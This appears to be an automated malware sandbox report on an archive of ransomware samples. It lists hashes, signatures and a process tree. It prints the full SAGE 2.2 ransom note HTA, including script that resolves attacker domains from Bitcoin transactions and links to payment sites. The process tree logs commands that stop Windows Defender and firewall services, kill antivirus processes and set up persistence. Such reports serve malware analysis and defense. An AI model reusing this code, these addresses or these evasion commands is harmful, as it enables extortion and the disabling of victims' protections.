Overview

overview

10

Static

static

1

RNSM00348.7z

windows7-x64

10

Analysis

  • max time kernel
    40s
  • max time network
    241s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    10-11-2024 15:48

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    RNSM00348.7z

  • Size

    8.1MB

  • MD5

    74af02587adf272cdd45bbcccd66da4a

  • SHA1

    cf4703a38ea02d566a3cd5f42e8d1944ede47fab

  • SHA256

    1268b4063016174364afe89680b40b35aab7b1908b72edec7a5138cd3ac69763

  • SHA512

    9c4011e17862e9daaffeaf75c1e315cbeb1da5723219bd691fab4ccdb69e9ab91fd9a066c2de31122b2447f6176e5278789ab2999f73253b96427addec320d45

  • SSDEEP

    196608:/oMxaBJTA6Xn8nhZl4RMb8LUszeS8JNoE+Pq5GwA8d9q:AMQbTrXnIGgUeFow59q

Score
10/10
rmsdefense_evasiondiscoveryevasionexecutionimpactpersistenceransomwarerattrojanupx

Malware Config

Extracted

Path

C:\Users\Admin\Music\!HELP_SOS.hta

Ransom Note
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>Decryption Instructions</title> <HTA:APPLICATION ID='App' APPLICATIONNAME="Decryption Instructions" SCROLL="yes" SINGLEINSTANCE="yes" WINDOWSTATE="maximize"> <style> a { color: #04a; text-decoration: none; } a:hover { text-decoration: underline; } body { background-color: #e7e7e7; color: #222; font-family: "Lucida Sans Unicode", "Lucida Grande", sans-serif; font-size: 12pt; line-height: 16pt; } body, h1 { margin: 0; padding: 0; } h1 { color: #555; text-align: center; padding-bottom: 1.5em; } h2 { color: #555; text-align: center; } ol li { padding-bottom: 13pt; } .container { background-color: #EEE; border: 2pt solid #C7C7C7; margin: 3%; min-width: 600px; padding: 5% 10%; color: #444; } .filecontainer{ padding: 5% 10%; display: none; } .header { border-bottom: 2pt solid #c7c7c7; padding-bottom: 5%; } .hr { background: #bda; display: block; height: 2pt; margin-top: 1.5%; margin-bottom: 1.5%; overflow: hidden; width: 100%; } .key{ background-color: #A1D490; border: 1px solid #506A48; display: block; text-align: center; margin: 0.5em 0; padding: 1em 1.5em; word-wrap: break-word; } .keys{ margin: 3em 0; } .filename{ border: 3px solid #AAA; display: block; text-align: center; margin: 0.5em 0em; padding: 1em 1.5em; background-color: #DCC; } .us{ text-decoration: strong; color: #333; } .info{ background-color: #E4E4E4; padding: 0.5em 3em; margin: 1em 0; } .text{ text-align: justify; } #file{ background-color: #FCC; } .lsb{ display: none; margin: 3%; text-align: center; } .ls{ border: 1px solid #888; border-radius: 3px; padding: 0 0.5em; margin: 1em 0.1em; line-height: 2em; display: inline-block; } .ls:hover{ background-color: #D0D0D0; } .l{ display:none; } .lu{ display:none; } </style> <script language="vbscript"> Function GetCmd GetCmd = App.commandLine End Function </script> <script language="javascript"> function openlink(url){ new ActiveXObject("WScript.Shell").Run(url); return false; } function aIndexOf(arr, v){ for(var i = 0; i < arr.length; i++) if(arr[i] == v) return i; return -1; } function tweakClass(cl, f){ var els; if(document.getElementByClassName != null){ els = document.getElementsByClassName(cl); } else{ els = []; var tmp = document.getElementsByTagName('*'); for (var i = 0; i < tmp.length; i++){ var c = tmp[i].className; if( (c == cl) || ((c.indexOf(cl) != 1) && ((' '+c+' ').indexOf(' '+cl+' ') != -1)) ) els.push(tmp[i]); } } for(var i = 0; i < els.length; i++) f(els[i]); } function show(el){ el.style.display = 'block'; } function hide(el){ el.style.display = 'none'; } var langs = ["en","de","it","pt","es","fr","kr","nl","ar","fa","zh"]; function setLang(lang){ if(aIndexOf(langs, lang) == -1) lang = langs[0]; for(var i = 0; i < langs.length; i++){ var clang = langs[i]; tweakClass('l-'+clang, function(el){ el.style.display = (clang == lang) ? 'block' : 'none'; }); tweakClass('ls-'+clang, function(el){ el.style.backgroundColor = (clang == lang) ? '#BBB' : ''; }); } } function newXHR() { if (window.XMLHttpRequest) return new window.XMLHttpRequest; try { return new ActiveXObject("MSXML2.XMLHTTP.3.0"); } catch(error) { return null; } } function getPage(url, cb) { try{ var xhr = newXHR(); if(!xhr) return cb('no xhr'); xhr.onreadystatechange = function() { if(xhr.readyState != 4) return; if(xhr.status != 200 || !xhr.responseText) return cb(xhr.status) cb(null, xhr.responseText); }; xhr.open("GET", url+((url.indexOf('?') == -1) ? "?" : "&") + "_=" + new Date().getTime(), true); xhr.send(); } catch(e){ cb(e); } } function decodeTxString(hex){ var m = '0123456789abcdef'; var s = ''; var c = 0xAA; hex = hex.toLowerCase(); for(var i = 0; i < hex.length; i+=2){ var a = m.indexOf(hex.charAt(i)); var b = m.indexOf(hex.charAt(i+1)); if(a == -1 || b == -1) throw hex[i]+hex[i+1]+' '+a+' '+b; s+= String.fromCharCode(c = (c ^ ((a << 4) | b))); } return s; } var OR = 'OP_RE'+'TURN '; var sources = [ {bp:'btc.b'+'lockr.i'+'o/api/v1/', txp:'tx/i'+'nfo/', adp:'add'+'ress/txs/', ptxs: function(json){ if(json.status != 'success') return null; var res = []; for(var i = 0; i < json.data.txs.length - 1; i++) res.push(json.data.txs[i].tx); return res; }, ptx: function(json){ if(json.status != 'success') return null; var os = json.data.vouts; for(var i = 0; i < os.length; i++) if(os[i].extras.asm.indexOf(OR) == 0) return decodeTxString(os[i].extras.asm.substr(10)); return null; } }, {bp:'ch'+'ain.s'+'o/api/v2/', txp:'get_t'+'x_out'+'puts/btc/', adp:'get_tx_uns'+'pent/btc/', ptxs: function(json){ if(json.status != 'success') return null; var res = []; for(var i = json.data.txs.length - 1; i >= 0; i--) res.push(json.data.txs[i].txid); return res; }, ptx: function(json){ if(json.status != 'success') return null; var os = json.data.outputs; for(var i = 0; i < os.length; i++) if(os[i].script.indexOf(OR) == 0) return decodeTxString(os[i].script.substr(10)); return null; } }, {bp:'bit'+'aps.co'+'m/api/', txp:'trans'+'action/', adp:'ad'+'dress/tra'+'nsactions/', adpb:'/0/sen'+'t/all', ptxs: function(json){ var res = []; for(var i = 0; i < json.length; i++) res.push(json[i][1]); return res; }, ptx: function(json){ var os = json.output; for(var i = 0; i < os.length; i++) if(os[i].script.asm.indexOf(OR) == 0) return decodeTxString(os[i].script.asm.substr(10)); return null; } }, {bp:'api.b'+'lockcyp'+'her.com/v1/b'+'tc/main/', txp:'txs/', adp:'addrs/', ptxs: function(json){ var res = []; var m = {}; for(var i = 0; i < json.txrefs.length; i++){ var tx = json.txrefs[i].tx_hash; if(m[tx]) continue; m[tx] = 1; res.push(tx); } return res; }, ptx: function(json){ var os = json.outputs; for(var i = 0; i < os.length; i++) if(os[i].data_hex != null) return decodeTxString(os[i].data_hex); return null; } } ]; function eachUntil(a,f,c){ var i = 0; var n = function(){ if(i >= a.length) return c('f'); f(a[i++], function(err, res){ if(err == null) return c(null, res); n(); }); }; n(); } function getJson(url, cb){ getPage(url, function(err, res){ if(err != null) return cb(err); var json; try{ if(window.JSON && window.JSON.parse){ json = window.JSON.parse(res); } else{ json = eval('('+res+')'); } } catch(e){ cb(e); } cb(null, json); }); } function getDomains(ad, cb){ eachUntil(sources, function(s, cb){ var url = 'http://'+s.bp; url+= s.adp+ad; if(s.adpb) url+= s.adpb; getJson(url, function(err, json){ if(err != null) return cb(err); try{ cb(null, s.ptxs(json)); } catch(e){ cb(e); } }); }, function(err, txs){ if(err != null) return cb(err); if(txs.length == 0) return cb('f'); eachUntil(txs, function(tx, cb){ eachUntil(sources, function(s, cb){ var url = 'http://'+s.bp+s.txp+tx; getJson(url, function(err, json){ if(err != null) return cb(err); try{ cb(null, s.ptx(json)); } catch(e){ cb(e); } }); }, function(err, res){ if(err != null) return cb(err); if(res == null) return cb('f'); cb(null, res.split(':')); }); }, cb); }); } function updateLinks(){ tweakClass('lu', hide); tweakClass('lu-updating', show); getDomains('1783wBG'+'sr'+'1zkxenfE'+'ELXA25PLSkL'+'dfJ4B7', function(err, ds){ tweakClass('lu', hide); if(err != null){ tweakClass('lu-error', show); // tweakClass('links', function(el){ el.innerHTML = err; }); return; } tweakClass('lu-done', show); var html = ''; for(var i = 0; i < ds.length; i++) html+= '<div class="key"><a href="http://7gie6ffnkrjykggd.'+ds[i]+'/login/AdOlf_hQVVjzkGnF0pkWOGt-SIbHMEkcQ2c4bsBbkdET0IZytdPfNAXA" onclick="javascript:return openlink(this.href)">http://7gie6ffnkrjykggd.'+ds[i]+'/</a></div>'; tweakClass('links', function(el){ el.innerHTML = html; }); }); return false; } function onPageLoaded(){ try{ tweakClass('lsb', show); }catch(e){} try{ tweakClass('lu-orig', show); }catch(e){} try{ setLang('en'); }catch(e){} try{ var args = GetCmd().match(/"[^"]+"|[^ ]+/g); if(args.length > 1){ var file = args[args.length-1]; if(file.charAt(0) == '"' && file.charAt(file.length-1) == '"') file = file.substr(1, file.length-2); document.getElementById('filename').innerHTML = file; show(document.getElementById('file')); document.title = 'File is encrypted'; } }catch(e){} } </script> </head> <body onload='javascript:onPageLoaded()'> <div class='lsb'> <span class='ls ls-en' onclick="javascript:return setLang('en')">English</span> <span class='ls ls-de' onclick="javascript:return setLang('de')">Deutsch</span> <span class='ls ls-it' onclick="javascript:return setLang('it')">Italiano</span> <span class='ls ls-pt' onclick="javascript:return setLang('pt')">Português</span> <span class='ls ls-es' onclick="javascript:return setLang('es')">Español</span> <span class='ls ls-fr' onclick="javascript:return setLang('fr')">Français</span> <span class='ls ls-kr' onclick="javascript:return setLang('kr')">한국어</span> <span class='ls ls-nl' onclick="javascript:return setLang('nl')">Nederlands</span> <span class='ls ls-ar' onclick="javascript:return setLang('ar')">العربية</span> <span class='ls ls-fa' onclick="javascript:return setLang('fa')">فارسی</span> <span class='ls ls-zh' onclick="javascript:return setLang('zh')">中文</span> </div> <div id='file' class='container filecontainer'> <div class='filename'> <div style='float:left; padding:18px 0'><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADEAAABACAYAAACz4p94AAAABmJLR0QA/wD/AP+gvaeTAAAACXBIWXMAARCQAAEQkAGJrNK4AAAAB3RJTUUH4QEcFBoaYAOrHQAABThJREFUaN7tmlloXGUUx3/3ziRtTa2xcZ1gtaJFDFjtwSqllaKiiEilKOKDNS2UivXF+qD0QRBRUMQXN/TBBcFifahYFC0urfpghSMqaDSkdQMvojZpIk2zTMaHe776MZ17M6u9ozkwzAwz3/ed/9m+s9yABkhEUFX/+43ATcBy4FxgMdABTAB/Aj8CXwO7VfVdb10AlPy9aqGgTuYDVS3Z56XA48AtdWz1OrBdVQ82AiaoVfJATlWLIrIAeAbYWKciS975LwJ3q+pEJQ03DYRJKVDVGRFZCew0kylnqFaaAULgB+B2Vd1fru3ZKFcDAFS1JCLXA7uBMxs1S29t0fzn5kKhMBBF0WAURYgIURQ1DsIAhKaBVcAbwKk0l0JgGlgIrCkUChpF0U/VAgmrOCBvPrAEeBY4jdZQ3jRyDvCEiJxl2ne+mLowTQs5VZ0yJ95mobMaRx0A3gMGgSPAycCFwHXARQlrfKFeDjwMbG7IsT0zKorIauBtYFGFvxY9s3wZ2Kaqwyn7dgNPpkQ1t9/PwGZV3TNbxErThAOwCOhPADBtexwGNqrqrrR4bxFnBNgkIm8CrwFdCX66BNgA7KlLE2aDeVWdFpHlwPsVfMEBGAXuUtUd1YRGH6CIrLdAESZoYxC4Q1U/r8exQwMQAFdb+CuP7U6LO6oF4MK0d+47ZlpJfJ0HXFsm3OpB2HsPsCZBUtgF9VSZo85KFq7zqnrUTOq3ChYyA3QCq7x1NYFwZnYKsKJCFOqwz59YJKo5VTAmAQ4CuxKiHUCviCyryZzMhIqeOnsSDh8B9qnqTJqU0kKyAT8MfJwiyB5gWa0+ETjGgPOBeQkSGgG+rPdmM99wfjUEHEoA0Q0srRmEaSRv+VFHAogx84lGyO01ChxI+E8XcHq9aUdnhahU8uL471bszJoWVEFHbL8kHhfXCyIE5qesGXX+UW9F5mli0jSbRPMaAdGZ8vtUtSG1ykg1mXIRdzaaxVYjSU7kPmFKaAsq5DW+dBY2WAyV89GV8ntXran4tGfzW4B7K0grAI5WMIF6zAjgD2ATsDXhrPFaGwGZJhE59jrOPMraMIuBK4EzTFqlE8x7YNr6TFUP+dkwQCAiobuhRWQt8DTQl2FlfAtsVdW9DoyviUeA7U1owbSSfL4eU9UHjlVRInI/8FDGATizcvytLhQKQRRFewMRuQJ4y+y/Xcg13IaA/tBCWxftRe5+uwC4NQTWzpabZFgbAFeF1qzKtSEIp40+l+QFtC91hvwHaA7E/xlEKesgZrz6u19VA/eytH64FUGkmSCKtt8XwKWq+opL0GxE8AKwknh6mkkQ03bXRMTT0F9d7m/pfdGy5SHgPtclyRoIZyLfAR95APC6If4A5sOsgfB7UQe88jbJoceI+6+ZdeyOKrWWzxqIwJN+H/F8rlJDzR8XrMiyT1wM3OnX7V797oBeQzxYbF6lJCLTTcpi3fhrBNiiqjsrNCBuIx5Ozs+qT+SJW5vdxHPoS3yHlrjH8nyzAbTCsZ1ZjfPPoMa/DMdpAc0lgHMg2gREqcxPSrSoHdoqx+4Ceu3Sc4x3c/wkNpMgclZT9AIPisjZFl57gUeZZeKThcuuvDhyAppsFfOt9gl/385/w7FLtDmFwF9ebdxO5IQ/HBIPLabaGMT+kLitP9GGAELi4ecHIfAqyc9VZJWc+SvwUi6KorFCofANsA44qQ0AuEfrfgHuUdWB0IqWT4Ebml3At4hywPfAelXd5y47sIfY7XbdQNytuwxYkCHmR4GvgOfcM4fGL38Dzdjo/H/3PFAAAAAASUVORK5CYII=" style='padding:0 7.5px'/></div> <div> <h2 class='l l-en' style='display:block'>The file is encrypted but can be restored</h2> <h2 class='l l-de' >Die Datei ist verschlüsselt, aber kann wiederhergestellt werden</h2> <h2 class='l l-it' >Il file è crittografato, ma può essere ripristinato</h2> <h2 class='l l-pt' >O arquivo está criptografado, mas poderá ser descriptografado</h2> <h2 class='l l-es' >El archivo está encriptado pero puede ser restaurado</h2> <h2 class='l l-fr' >Le fichier est crypté mais peut être restauré</h2> <h2 class='l l-kr' >파일은 암호화되었지만 복원 할 수 있습니다</h2> <h2 class='l l-nl' >Het bestand is versleuteld maar kan worden hersteld</h2> <h2 class='l l-ar' > الملف مشفر لكن من الممكن إسترجاعه </h2> <h2 class='l l-fa' >این فایل رمزگذاری شده است اما می تواند بازیابی شود</h2> <h2 class='l l-zh' >文件已被加密,但是可以解密</h2> <p><span id='filename'></span></p> </div> </div> <h2>The file you tried to open and other important files on your computer were encrypted by "SAGE 2.2 Ransomware".</h2> <h2>Action required to restore your files.</h2> </div> <div class='container'> <div class="text l l-en" style='display:block'> <h1>File recovery instructions</h2> <p>You probably noticed that you can not open your files and that some software stopped working correctly.</p> <p>This is expected. Your files content is still there, but it was encrypted by <span class='us'>"SAGE 2.2 Ransomware"</span>.</p> <p>Your files are not lost, it is possible to revert them back to normal state by decrypting.</p> <p>The only way you can do that is by getting <span class='us'>"SAGE Decrypter"</span> software and your personal decryption key.</p> <div class='info'> <p>Using any other software which claims to be able to restore your files will result in files being damaged or destroyed.</p> </div> <p>You can purchase <span class='us'>"SAGE Decrypter"</span> software and your decryption key at your personal page you can access by following links:</p> <div class='keys links'> <div class='key'> <a href="http://7gie6ffnkrjykggd.jktew0.com/login/AdOlf_hQVVjzkGnF0pkWOGt-SIbHMEkcQ2c4bsBbkdET0IZytdPfNAXA" onclick='javascript:return openlink(this.href)'>http://7gie6ffnkrjykggd.jktew0.com/</a> </div> <div class='key'> <a href="http://7gie6ffnkrjykggd.jpo2z1.net/login/AdOlf_hQVVjzkGnF0pkWOGt-SIbHMEkcQ2c4bsBbkdET0IZytdPfNAXA" onclick='javascript:return openlink(this.href)'>http://7gie6ffnkrjykggd.jpo2z1.net/</a> </div> <div class='key'> <a href="http://7gie6ffnkrjykggd.lfsjkad.net/login/AdOlf_hQVVjzkGnF0pkWOGt-SIbHMEkcQ2c4bsBbkdET0IZytdPfNAXA" onclick='javascript:return openlink(this.href)'>http://7gie6ffnkrjykggd.lfsjkad.net/</a> </div> <div class='key'> <a href="http://7gie6ffnkrjykggd.yio3lvx.com/login/AdOlf_hQVVjzkGnF0pkWOGt-SIbHMEkcQ2c4bsBbkdET0IZytdPfNAXA" onclick='javascript:return openlink(this.href)'>http://7gie6ffnkrjykggd.yio3lvx.com/</a> </div> </div> <div class='info lu lu-orig'> <p>If none of these links work for you, <a href='#' onclick='javascript:return updateLinks()'><b>click here</b></a> to update the list.</p> </div> <div class='info lu lu-updating'> <p>Updating links...</p> </div> <div class='info lu lu-error'> <p>Something went wrong while updating links, please wait some time and <a href='#' onclick='javascript:return updateLinks()'><b>try again</b></a> or use "Tor Browser" method below.</p> </div> <div class='info lu lu-done'> <p>Links updated, if new ones still don't work, please wait some time and <a href='#' onclick='javascript:return updateLinks()'><b>try again</b></a> or use "Tor Browser" method below.</p> </div> <p>If you are asked for your personal key, copy it to the form on the site. This is your personal key:</p> <div class='keys'> <div class='key'> AdOlf_hQVVjzkGnF0pkWOGt-SIbHMEkcQ2c4bsBbkdET0IZytdPfNAXA </div> </div> <p>You will also be able to decrypt one file for free to make sure "SAGE Decrypter" software is able to recover your files</p> <div class='info'> <p>If none of those links work for you for a prolonged period of time or you need your files recovered as fast as possible, you can also access your personal page using "Tor Browser".</p> <p>In order to do that you need to:</p> <ol> <li>
URLs

http://'+s.bp

http://'+s.bp+s.txp+tx

Signatures

  • Disables service(s) 3 TTPs
    evasionexecution
  • RMS

    Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.

    trojanratrms
  • Rms family
    rms
  • Contacts a large (7704) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Creates new service(s) 2 TTPs
    persistenceexecution
  • ACProtect 1.3x - 1.4x DLL software 4 IoCs

    Detects file using ACProtect software.

  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

    discovery
  • Power Settings 1 TTPs 2 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

    persistence
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
    discovery
  • UPX packed file 17 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Launches sc.exe 18 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 5 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • NSIS installer 4 IoCs
    installer
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Interacts with shadow copies 3 TTPs 3 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Kills process with taskkill 23 IoCs
    evasion
  • Runs .reg file with regedit 1 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 5 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 41 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of FindShellTrayWindow 50 IoCs
  • Suspicious use of SendNotifyMessage 46 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Views/modifies file attributes 1 TTPs 5 IoCs
    evasion

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00348.7z"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:1736
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:2932
  • C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2796
    • C:\Users\Admin\Desktop\00348\HEUR-Trojan-Ransom.MSIL.Blocker.gen-4cb453717b2f4fabf2a37e0be4e4ad351294683d04481d7109f00353b5d1db3d.exe
      HEUR-Trojan-Ransom.MSIL.Blocker.gen-4cb453717b2f4fabf2a37e0be4e4ad351294683d04481d7109f00353b5d1db3d.exe
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      PID:1392
      • C:\Users\Admin\Desktop\00348\HEUR-Trojan-Ransom.MSIL.Blocker.gen-4cb453717b2f4fabf2a37e0be4e4ad351294683d04481d7109f00353b5d1db3d.exe
        "HEUR-Trojan-Ransom.MSIL.Blocker.gen-4cb453717b2f4fabf2a37e0be4e4ad351294683d04481d7109f00353b5d1db3d.exe"
        3⤵
          PID:2196
      • C:\Users\Admin\Desktop\00348\Trojan-Ransom.Win32.Blocker.lccc-86ee350ba2156b1064c54f90e36aeebdb45bec95966dca716daf7aa6ff5ea398.exe
        Trojan-Ransom.Win32.Blocker.lccc-86ee350ba2156b1064c54f90e36aeebdb45bec95966dca716daf7aa6ff5ea398.exe
        2⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious use of FindShellTrayWindow
        PID:2696
        • C:\Windows\SysWOW64\msiexec.exe
          C:\Windows\SysWOW64\msiexec.exe
          3⤵
            PID:1332
            • C:\Windows\SysWOW64\msiexec.exe
              C:\Windows\SysWOW64\msiexec.exe
              4⤵
                PID:2276
          • C:\Users\Admin\Desktop\00348\Trojan-Ransom.Win32.Blocker.lise-3e900ee08033135cd072715760304e7596fd52ee1a48e13a582a1bb04ae488f4.exe
            Trojan-Ransom.Win32.Blocker.lise-3e900ee08033135cd072715760304e7596fd52ee1a48e13a582a1bb04ae488f4.exe
            2⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2712
            • C:\Windows\SysWOW64\schtasks.exe
              "C:\Windows\system32\schtasks.exe" /Create /XML "C:\ProgramData\softenza.xml" /TN "softenza" /F
              3⤵
              • Scheduled Task/Job: Scheduled Task
              PID:2164
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\system32\sc.exe" create "SysdService" binpath= "C:\ProgramData\WindowsDriverFoundation\mqsvcss.exe" DisplayName= "System Driver Foundation - System-Mode Driver Framework." type= own start= auto
              3⤵
              • Launches sc.exe
              PID:2584
            • C:\Windows\SysWOW64\wscript.exe
              "C:\Windows\system32\wscript.exe" C:\ProgramData\setu.vbs
              3⤵
                PID:1360
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c ""C:\ProgramData\setu.bat" "
                  4⤵
                    PID:2064
                    • C:\Windows\SysWOW64\attrib.exe
                      ATTRIB -S -R -H C:\ProgramData
                      5⤵
                      • Views/modifies file attributes
                      PID:1668
                    • C:\Windows\SysWOW64\net.exe
                      NET STOP WPCSvc
                      5⤵
                        PID:1012
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 STOP WPCSvc
                          6⤵
                            PID:1520
                        • C:\Windows\SysWOW64\net.exe
                          NET STOP MpsSvc
                          5⤵
                            PID:1064
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 STOP MpsSvc
                              6⤵
                                PID:2244
                            • C:\Windows\SysWOW64\net.exe
                              NET STOP wscsvc
                              5⤵
                                PID:2372
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 STOP wscsvc
                                  6⤵
                                    PID:1604
                                • C:\Windows\SysWOW64\net.exe
                                  NET STOP WinDefend
                                  5⤵
                                    PID:1484
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 STOP WinDefend
                                      6⤵
                                        PID:1736
                                    • C:\Windows\SysWOW64\net.exe
                                      NET STOP "WerSvc"
                                      5⤵
                                        PID:1648
                                        • C:\Windows\SysWOW64\net1.exe
                                          C:\Windows\system32\net1 STOP "WerSvc"
                                          6⤵
                                            PID:288
                                        • C:\Windows\SysWOW64\net.exe
                                          NET STOP "SharedAccess"
                                          5⤵
                                            PID:2720
                                            • C:\Windows\SysWOW64\net1.exe
                                              C:\Windows\system32\net1 STOP "SharedAccess"
                                              6⤵
                                                PID:2808
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /F /T /IM mcupdate.exe
                                              5⤵
                                              • Kills process with taskkill
                                              PID:2964
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /F /T /IM aswidsagenta.exe
                                              5⤵
                                              • Kills process with taskkill
                                              PID:1300
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /F /T /IM AvastSvc.exe
                                              5⤵
                                              • Kills process with taskkill
                                              PID:1304
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /F /T /IM wsc_proxy.exe
                                              5⤵
                                              • Kills process with taskkill
                                              PID:1912
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /F /T /IM AvastUI.exe
                                              5⤵
                                              • Kills process with taskkill
                                              PID:2096
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /F /T /IM firewall.exe
                                              5⤵
                                              • Kills process with taskkill
                                              PID:1348
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /F /T /IM MSASCui.exe
                                              5⤵
                                              • Kills process with taskkill
                                              PID:2876
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /F /T /IM defense.exe
                                              5⤵
                                              • Kills process with taskkill
                                              PID:2976
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /F /T /IM nod32krn.exe
                                              5⤵
                                              • Kills process with taskkill
                                              PID:1008
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /F /T /IM nod32.exe
                                              5⤵
                                              • Kills process with taskkill
                                              PID:868
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /F /T /IM nod32kui.exe
                                              5⤵
                                              • Kills process with taskkill
                                              PID:1764
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /F /T /IM mcafee.exe
                                              5⤵
                                              • Kills process with taskkill
                                              PID:1160
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /F /T /IM mghtml.exe
                                              5⤵
                                              • Kills process with taskkill
                                              PID:1780
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /F /T /IM guard.exe
                                              5⤵
                                              • Kills process with taskkill
                                              PID:596
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /F /T /IM guarddog.exe
                                              5⤵
                                              • Kills process with taskkill
                                              PID:2636
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /F /T /IM drweb32.exe
                                              5⤵
                                              • Kills process with taskkill
                                              PID:2936
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /F /T /IM dvp95.exe
                                              5⤵
                                              • Kills process with taskkill
                                              PID:2360
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /F /T /IM dvp95_0.exe
                                              5⤵
                                              • Kills process with taskkill
                                              PID:2248
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /F /T /IM rvlkl.exe
                                              5⤵
                                              • Kills process with taskkill
                                              PID:3028
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /F /T /IM rutserv.exe
                                              5⤵
                                              • Kills process with taskkill
                                              PID:1008
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /F /T /IM rfusclient.exe
                                              5⤵
                                              • Kills process with taskkill
                                              PID:1296
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /F /T /IM mqsvcss.exe
                                              5⤵
                                              • Kills process with taskkill
                                              PID:2244
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /F /T /IM mqssclient.exe
                                              5⤵
                                              • Kills process with taskkill
                                              PID:1752
                                            • C:\Windows\SysWOW64\net.exe
                                              net users
                                              5⤵
                                                PID:2176
                                                • C:\Windows\SysWOW64\net1.exe
                                                  C:\Windows\system32\net1 users
                                                  6⤵
                                                    PID:2360
                                                • C:\Windows\SysWOW64\ipconfig.exe
                                                  ipconfig /all
                                                  5⤵
                                                  • Gathers network information
                                                  PID:2948
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks
                                                  5⤵
                                                    PID:1488
                                                  • C:\Windows\SysWOW64\tasklist.exe
                                                    tasklist
                                                    5⤵
                                                    • Enumerates processes with tasklist
                                                    PID:2036
                                                  • C:\Windows\SysWOW64\wscript.exe
                                                    wscript.exe C:\Users\Admin\AppData\Local\Temp\send.vbs
                                                    5⤵
                                                      PID:2420
                                                      • C:\Windows\SysWOW64\regedit.exe
                                                        "C:\Windows\System32\regedit.exe" /s C:\ProgramData\se.reg
                                                        6⤵
                                                        • Runs .reg file with regedit
                                                        PID:3048
